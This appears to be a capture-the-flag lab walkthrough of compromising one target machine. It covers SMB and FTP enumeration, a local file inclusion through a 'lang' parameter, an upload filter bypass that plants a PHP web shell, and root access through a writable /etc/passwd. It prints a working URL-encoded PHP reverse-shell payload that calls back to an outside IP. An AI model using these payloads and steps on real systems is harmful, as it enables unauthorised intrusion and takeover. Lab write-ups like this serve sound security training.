Target IP: 192.168.186.91
Port 25: SMTP
Port 80: HTTP
Ports 139 and 445: SMB
Port 2121: FTP
Port 3306: MySQL
Ports 8080 and 63525: HTTP
There are many ports open on the target machine. I will start enumeration with SMB as it allows guest access. FTP also allows anonymous login too.
Ports 139 and 445: SMB
There is a share called WRKSHARE. I only have read access to it. I found a user called miguel. I also obtained the local.txt flag file using this access.
Port 2121: FTP
There is an interesting file called 22253251-65325.twilight when I use anonymous login to access FTP. This file contains the message shown above.
Port 80: HTTP
/Gallery
Performing a directory search using the command gobuster dir -u http://192.168.186.91 -w /usr/share/wordlists/dirb/big.txt -x php,html,txt output the result above.
There is an interesting directory called /gallery/. Looks like I can only upload jpeg files. After uploading a test jpeg file. I wonder where our images get stored on the target machine.
Using the WRKSHARE SMB share, I located where the images get stored on the server. When an image gets uploaded, it gets saved to three directories: original, thumbnail, and normal. So it is possible to access the uploaded images by http://192.168.186.91/gallery/<directory_name>/<image_name>. For example, I accessed my test image above my browsing to http://192.168.186.91/gallery/original/image.jpeg.
/lang.php
The webpage above is displayed for this HTTP application. It looks like I can change the language of the page by pressing the button.
An interesting parameter called lang got appened at the end of the URL. Since it is trying to include the page -- could this host be vulnerable to LFI?
And bingo. The target host is vulnerable to LFI as I was able to access /etc/passwd file. Trying to access the SSH key of miguel did not work.
And it is possible to obtain the images from the different directories located in /gallery/ application; for example, by browsing to http://192.168.186.91/lang.php?lang=../../../../../../var/www/html/gallery/original/image.jpeg. I should be able to place a simple-web shell inside a JPEG image using this technique, and escalate it to a reverse shell connection.
I created a copy of the same test image above. I intercepted the POST request of file upload using BurpSuite and made changes to the highlighted items above. Looks like the server only checks if the filename contains .jpeg, meaning it is possible to bypass this by appending the extension with a .php, so it will be evil.jpeg.php. I removed the image content and replaced it with a simple PHP one-line command for the web-shell.
And this uploaded successfully.
I can now access my web-shell by browsing to http://192.168.186.91/lang.php?lang=../../../../../../var/www/html/gallery/original/evil.jpeg.php. In the image above, I sent the payload whoami;ls and obtained the results. Time to upgrade this simple shell to a reverse shell connection. Since the host is running PHP, I will use a PHP payload.
Now I have a foothold on the machine using file upload vulnerability. I used the payload mentioned below.
Payload used: php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.45.195%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
URL with payload: 192.168.186.91/lang.php?lang=../../../../../../var/www/html/gallery/original/evil.jpeg.php&cmd=php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.45.195%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
WTF. Looks like I can make changes to the /etc/passwd file and create a new user with root privileges.
I created a new user called super with the password rooted. Now I have root access with this new user.
The proof.txt and local.txt flags. The local.txt flag can be obtained using the SMB WRKSHARE without exploiting the machine. I obtained the proof.txt flag due to the weak file permission set on /etc/passwd file.